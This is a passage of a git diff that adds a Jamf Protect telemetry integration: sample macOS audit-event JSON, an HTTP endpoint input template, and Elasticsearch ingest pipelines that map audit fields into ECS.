"11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "beef65d6aeba15d0dd7ef1a076d4bcbd386c1652", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/usr/libexec/mdmclient", + "pid": 70971 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.mdmclient" + }, + "exit_code": 0, + "hash": { + "sha1": "b71712207edc22d9b5753aac0d927a7d9ded719d" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "b71712207edc22d9b5753aac0d927a7d9ded719d" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T15:54:28.477Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_ssauthorize", + "category": [ + "authentication" + ], + "code": "45025", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "fc3dce73c15ec7a1cba507101fec3a47e268fa27", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/usr/libexec/mdmclient", + "pid": 69544 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 959597, + "type": "4" + } + }, + "texts": [ + "com.apple.ServiceManagement.daemons.modify", + "client /usr/libexec/mdmclient", + "creator /usr/libexec/mdmclient" + ] + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.authd" + }, + "exit_code": 0, + "hash": { + "sha1": "b71712207edc22d9b5753aac0d927a7d9ded719d" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "b71712207edc22d9b5753aac0d927a7d9ded719d" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:08:56.272Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_session_end", + "category": [ + "authentication" + ], + "code": "44903", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Goomba", + "id": "H2WHM0PAQ6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "am_failure": "0", + "am_success": "0", + "sflags": "0" + }, + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "667A9510-585B-526B-9B61-47BD834C8ECE" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "pid": 0 + }, + "session": { + "id": "101188" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "exit_code": 0, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hosts": [ + "Goomba" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..b1f76c36101 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs @@ -0,0 +1,35 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..12cf8ae9493 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,54 @@ +--- +description: Pipeline for Jamf Protect Telemetry logs. +processors: + - set: + field: ecs.version + value: '8.11.0' + - rename: + field: message + target_field: event.original + ignore_missing: true + - json: + field: event.original + target_field: json + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_system_performance_metrics" }}' + if: ctx.json?.header?.event_name == 'SYSTEM_PERFORMANCE_METRICS' + - pipeline: + name: '{{ IngestPipeline "pipeline_audit" }}' + if: ctx.json?.header?.event_name != null && ctx.json?.header?.event_name.startsWith('AUE_') + - pipeline: + name: '{{ IngestPipeline "pipeline_bios_firmware_versions" }}' + if: ctx.json?.header?.event_name == 'BIOS_FIRMWARE_VERSIONS' + - pipeline: + name: '{{ IngestPipeline "pipeline_event" }}' + if: "['FILE_COLLECTION_EVENT','PLAINTEXT_LOG_COLLECTION'].contains(ctx.json?.header?.event_name)" + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - remove: + field: json + ignore_missing: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml new file mode 100644 index 00000000000..097f35f0c9a --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml @@ -0,0 +1,357 @@ +--- +description: Pipeline for Jamf Protect Telemetry audit logs. +processors: + - set: + field: jamf_protect.telemetry.dataset + value: audit + - convert: + field: json._event_score + target_field: jamf_protect.telemetry.event_score + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.header.event_id + target_field: event.code + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.header.event_modifier + target_field: jamf_protect.telemetry.header.event_modifier + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.header.event_name + target_field: event.action + ignore_missing: true + - lowercase: + field: event.action + ignore_missing: true + - script: + lang: painless + if: ctx.json?.header?.time_seconds_epoch != 0 + source: | + ctx.json.time_milliseconds = (long)ctx.json?.header?.time_seconds_epoch * 1000 + (long)ctx.json?.header?.time_milliseconds_offset; + - date: + field: json.time_milliseconds + if: ctx.json?.time_milliseconds != 0 + formats: + - UNIX_MS + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.header.version + target_field: jamf_protect.telemetry.header.version + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.host_info.host_name + target_field: host.hostname + ignore_missing: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + if: ctx.host?.hostname != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.host_info.host_uuid + target_field: jamf_protect.telemetry.host_info.host.uuid + ignore_missing: true + - rename: + field: json.host_info.osversion + target_field: host.os.version + ignore_missing: true + - append: + field: host.mac + value: '{{{json.host_info.primary_mac_address}}}' + if: ctx.json?.host_info?.primary_mac_address != null + allow_duplicates: false + ignore_failure: true + - gsub: + field: host.mac + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + - uppercase: + field: host.mac + ignore_missing: true + - rename: + field: json.host_info.serial_number + target_field: host.id + ignore_missing: true + - rename: + field: json.return.description + target_field: jamf_protect.telemetry.return.description + ignore_missing: true + - convert: + field: json.return.error + target_field: error.code + type: string + ignore_missing: true + ignore_failure: true + - set: + field: event.outcome + value: 'success' + if: ctx.error?.code == '0' + - set: + field: event.outcome + value: 'failure' + if: ctx.error?.code != '0' + - convert: + field: json.return.return_value + target_field: process.exit_code + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.subject.audit_id + target_field: process.real_user.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.subject.audit_user_name + target_field: process.real_user.name + ignore_missing: true + - append: + field: related.user + value: '{{{process.real_user.name}}}' + if: ctx.process?.real_user?.name != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.subject.audit_user_name}}}' + if: ctx.json?.subject?.audit_user_name != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.subject.effective_group_id + target_field: jamf_protect.telemetry.subject.effective.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.subject.effective_group_name + target_field: jamf_protect.telemetry.subject.effective.group.name + ignore_missing: true + - convert: + field: json.subject.effective_user_id + target_field: process.user.id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.name + value: '{{{json.subject.effective_user_name}}}' + if: ctx.json?.subject?.effective_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.subject.effective_user_name}}}' + if: ctx.json?.subject?.effective_user_name != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.subject.effective_user_name + target_field: process.user.name + ignore_missing: true + - convert: + field: json.subject.group_id + target_field: process.real_group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.subject.group_name + target_field: process.real_group.name + ignore_missing: true + - rename: + field: json.subject.process_hash + target_field: process.hash.sha1 + ignore_missing: true + - append: + field: related.hash + value: '{{{process.hash.sha1}}}' + if: ctx.process?.hash?.sha1 != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.subject.process_id + target_field: jamf_protect.telemetry.subject.process.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.subject.process_name + target_field: jamf_protect.telemetry.subject.process.name + ignore_missing: true + - convert: + field: json.subject.session_id + target_field: jamf_protect.telemetry.subject.session.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.subject.terminal_id.addr + target_field: jamf_protect.telemetry.subject.terminal_id.addr + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.subject.terminal_id.ip_address + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.subject.terminal_id.ip_address + ignore_missing: true + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - append: + field: host.ip + value: '{{{json.subject.terminal_id.ip_address}}}' + if: ctx.json?.subject?.terminal_id?.ip_address != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.ip + value: '{{{json.subject.terminal_id.ip_address}}}' + if: ctx.json?.subject?.terminal_id?.ip_address != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.subject.terminal_id.port + target_field: jamf_protect.telemetry.subject.terminal_id.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.subject.terminal_id.type + target_field: jamf_protect.telemetry.subject.terminal_id.type + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.subject.user_id + target_field: user.id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.name + value: '{{{json.subject.user_name}}}' + if: ctx.json?.subject?.user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.subject.user_name}}}' + if: ctx.json?.subject?.user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: event.type + value: info + - set: + field: event.kind + value: event + - append: + field: event.category + value: authentication + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_accept" }}' + if: ctx.event?.action == 'aue_accept' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_auth" }}' + if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_bind_and_aue_connect" }}' + if: '["aue_bind", "aue_connect"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_chdir" }}' + if: ctx.event?.action == 'aue_chdir' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_chroot" }}' + if: ctx.event?.action == 'aue_chroot' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_execve" }}' + if: ctx.event?.action == 'aue_execve' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_exit" }}' + if: ctx.event?.action == 'aue_exit' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_kill" }}' + if: ctx.event?.action == 'aue_kill' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_mount" }}' + if: ctx.event?.action == 'aue_mount' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_posix_spawn" }}' + if: ctx.event?.action == 'aue_posix_spawn' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_remove_from_group_and_aue_mac_set_proc" }}' + if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_session" }}' + if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_arguments" }}' + if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_ssauthint" }}' + if: ctx.event?.action == 'aue_ssauthint' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_tasknameforpid" }}' + if: ctx.event?.action == 'aue_tasknameforpid' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_unmount" }}' + if: ctx.event?.action == 'aue_unmount' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_fork" }}' + if: ctx.event?.action == 'aue_fork' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event?.action)' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_listen" }}' + if: ctx.event?.action == 'aue_listen' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_logout" }}' + if: ctx.event?.action == 'aue_logout' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_pidfortask" }}' + if: ctx.event?.action == 'aue_pidfortask' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_setpriority" }}' + if: ctx.event?.action == 'aue_setpriority' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_socketpair" }}' + if: ctx.event?.action == 'aue_socketpair' + - pipeline: + name: '{{ IngestPipeline "pipeline_aue_taskforpid" }}' + if: ctx.event?.action == 'aue_taskforpid' +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml new file mode 100644 index 00000000000..0ef1034e8bd --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml @@ -0,0 +1,60 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_accept audit logs. +processors: + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - convert: + field: json.socket_unix.family + target_field: json.inet_family + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.socket_unix.path + target_field: jamf_protect.telemetry.socket.unix.path + ignore_missing: true + - convert: + field: json.arguments.fd + target_field: jamf_protect.telemetry.arguments.fd + type: string + ignore_missing: true + ignore_failure: true + - script: + description: Dynamically map Socket Address Families. + lang: painless + if: ctx.json?.inet_family != null + source: | + Map map = new HashMap(); + map.put('0', 'AF_UNSPEC'); + map.put('1', 'AF_LOCAL'); + map.put('AF_LOCAL', 'AF_UNIX'); + map.put('2', 'AF_INET'); + map.put('3', 'AF_ImapPLINK'); + map.put('4', 'AF_PUP'); + map.put('5', 'AF_CHAOS'); + map.put('6', 'AF_NS'); + map.put('7', 'AF_ISO'); + map.put('AF_ISO', 'AF_OSI'); + map.put('8', 'AF_ECmapA'); + map.put('9', 'AF_DATAKIT'); + map.put('10', 'AF_CCITT'); + map.put('11', 'AF_SNA'); + map.put('12', 'AF_DECnet'); + map.put('13', 'AF_DLI'); + map.put('14', 'AF_LAT'); + map.put('15', 'AF_HYLINK'); + map.put('16', 'AF_APPLETALK'); + map.put('17', 'AF_ROUTE'); + map.put('18', 'AF_LINK'); + map.put('19', 'pseudo_AF_XTP'); + map.put('20', 'AF_COIP'); + map.put('21', 'AF_CNT'); + map.put('22', 'pseudo_AF_RTIP'); + map.put('23', 'AF_IPX'); + map.put('24', 'AF_SIP'); + map.put('25', 'pseudo_AF_PIP'); + ctx.jamf_protect.telemetry.socket.unix.family = map.get(ctx.json.inet_family); + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml new file mode 100644 index 00000000000..82c19b19a57 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml @@ -0,0 +1,11 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_arguments audit logs. +processors: + - convert: + field: json.arguments.fd + target_field: jamf_protect.telemetry.arguments.fd + type: string + ignore_missing: true + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml new file mode 100644 index 00000000000..5b6bbb7d842 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml @@ -0,0 +1,9 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_auth audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.texts + target_field: jamf_protect.telemetry.texts + ignore_missing: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml new file mode 100644 index 00000000000..3d3d4c5e2d6 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml @@ -0,0 +1,91 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_bind and aue_connect audit logs. +processors: + - convert: + field: json.socket_inet.addr + target_field: jamf_protect.telemetry.socket.inet.addr + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.fd + target_field: jamf_protect.telemetry.arguments.fd + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.socket_inet.family + target_field: json.inet_family + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.socket_inet.id + target_field: jamf_protect.telemetry.socket.inet.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.socket_inet.ip_address + target_field: server.ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.socket_inet.ip_address + ignore_missing: true + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - append: + field: related.ip + value: '{{{server.ip}}}' + if: ctx.server?.ip != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.socket_inet.port + target_field: server.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - script: + description: Dynamically map Socket Address Families. + lang: painless + if: ctx.json?.inet_family != null + source: | + Map map = new HashMap(); + map.put('0', 'AF_UNSPEC'); + map.put('1', 'AF_LOCAL'); + map.put('AF_LOCAL', 'AF_UNIX'); + map.put('2', 'AF_INET'); + map.put('3', 'AF_ImapPLINK'); + map.put('4', 'AF_PUP'); + map.put('5', 'AF_CHAOS'); + map.put('6', 'AF_NS'); + map.put('7', 'AF_ISO'); + map.put('AF_ISO', 'AF_OSI'); + map.put('8', 'AF_ECmapA'); + map.put('9', 'AF_DATAKIT'); + map.put('10', 'AF_CCITT'); + map.put('11', 'AF_SNA'); + map.put('12', 'AF_DECnet'); + map.put('13', 'AF_DLI'); + map.put('14', 'AF_LAT'); + map.put('15', 'AF_HYLINK'); + map.put('16', 'AF_APPLETALK'); + map.put('17', 'AF_ROUTE'); + map.put('18', 'AF_LINK'); + map.put('19', 'pseudo_AF_XTP'); + map.put('20', 'AF_COIP'); + map.put('21', 'AF_CNT'); + map.put('22', 'pseudo_AF_RTIP'); + map.put('23', 'AF_IPX'); + map.put('24', 'AF_SIP'); + map.put('25', 'pseudo_AF_PIP'); + ctx.jamf_protect.telemetry.socket.inet.family = map.get(ctx.json.inet_family); + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml new file mode 100644 index 00000000000..e2bc1de2814 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml @@ -0,0 +1,70 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_chdir audit logs. +processors: + - convert: + field: json.attributes.device + target_field: jamf_protect.telemetry.attributes.device + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.file_access_mode + target_field: json.file_access_mode + ignore_failure: true + - convert: + field: json.attributes.file_system_id + target_field: jamf_protect.telemetry.attributes.file.system.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.node_id + target_field: jamf_protect.telemetry.attributes.node.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.owner_group_id + target_field: user.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.owner_group_name + target_field: user.group.name + ignore_missing: true + - convert: + field: json.attributes.owner_user_id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.id + value: '{{{json.attributes.owner_user_id}}}' + if: ctx.json?.attributes?.owner_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - script: + description: Convert Decimal into Octal. + lang: painless + source: | + int temp = (int)ctx.json?.file_access_mode; + ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml new file mode 100644 index 00000000000..d695d2efe4a --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml @@ -0,0 +1,72 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_chroot audit logs. +processors: + - convert: + field: json.attributes.device + target_field: jamf_protect.telemetry.attributes.device + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.file_access_mode + target_field: json.file_access_mode + ignore_missing: true + - convert: + field: json.attributes.file_system_id + target_field: jamf_protect.telemetry.attributes.file.system.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.node_id + target_field: jamf_protect.telemetry.attributes.node.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.owner_group_id + target_field: user.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.owner_group_name + target_field: user.group.name + ignore_missing: true + - convert: + field: json.attributes.owner_user_id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.id + value: '{{{json.attributes.owner_user_id}}}' + if: ctx.json?.attributes?.owner_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - script: + description: Convert Decimal into Octal. + lang: painless + source: | + int temp = (int)ctx.json?.file_access_mode; + ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml new file mode 100644 index 00000000000..663893d62a3 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml @@ -0,0 +1,141 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_execve audit logs. +processors: + - convert: + field: json.attributes.device + target_field: jamf_protect.telemetry.attributes.device + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.file_access_mode + target_field: json.file_access_mode + ignore_failure: true + - convert: + field: json.attributes.file_system_id + target_field: jamf_protect.telemetry.attributes.file.system.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.node_id + target_field: jamf_protect.telemetry.attributes.node.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.owner_group_id + target_field: user.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.owner_group_name + target_field: user.group.name + ignore_missing: true + - convert: + field: json.attributes.owner_user_id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.id + value: '{{{json.attributes.owner_user_id}}}' + if: ctx.json?.attributes?.owner_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - rename: + field: json.exec_args.args + target_field: json.args + ignore_missing: true + - rename: + field: json.exec_args.args_compiled + target_field: jamf_protect.telemetry.exec_args.args_compiled + ignore_missing: true + - script: + lang: painless + if: ctx.json?.exec_env?.env?.ARCH != null && ctx.json.exec_env.env.ARCH != '' + params: + 'allowed': + - linux + - macos + - unix + - windows + - ios + - android + 'replacements': + 'macintosh': macos + source: | + for (entry in params.replacements.entrySet()) { + if (ctx.json.exec_env.env.ARCH == entry.getKey()) { + ctx.json.exec_env.env.put('ARCH', entry.getValue()); + } + } + if (!params.allowed.contains(ctx.json.exec_env.env.ARCH)) { + return; + } + if (ctx.host == null) { + HashMap hm = new HashMap(); + ctx.put('host', hm); + } + if (ctx.host.os == null) { + HashMap hm = new HashMap(); + ctx.host.put('os', hm); + } + ctx.host.os.put('type', ctx.json.exec_env.env.ARCH); + ctx.json.exec_env.env.remove('ARCH'); + - rename: + field: json.exec_env.env.CPU + target_field: host.architecture + ignore_missing: true + - rename: + field: json.exec_env.env.PATH + target_field: jamf_protect.telemetry.exec_env.env.path + ignore_missing: true + - rename: + field: 